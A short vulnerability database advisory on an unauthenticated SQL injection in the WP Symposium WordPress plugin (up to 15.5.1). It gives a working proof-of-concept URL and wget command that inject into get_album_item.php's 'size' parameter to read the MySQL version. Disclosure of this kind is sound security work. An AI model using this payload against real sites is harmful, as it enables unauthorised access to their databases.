WP Symposium <= 15.5.1 - Unauthenticated SQL Injection

2015-08-09T00:00:00
ID WPVDB-ID:8140
Type wpvulndb
Reporter PizzaHatHacker
Modified 2019-10-22T00:00:00

Description

WordPress Vulnerability - WP Symposium <= 15.5.1 - Unauthenticated SQL Injection

PoC

PoC URL : http://localhost//wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20-- PoC Command (Unix) : wget "http://localhost//wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt In the content of the HTTP response you will find the MySQL version, for example : 5.5.44-0+deb7u1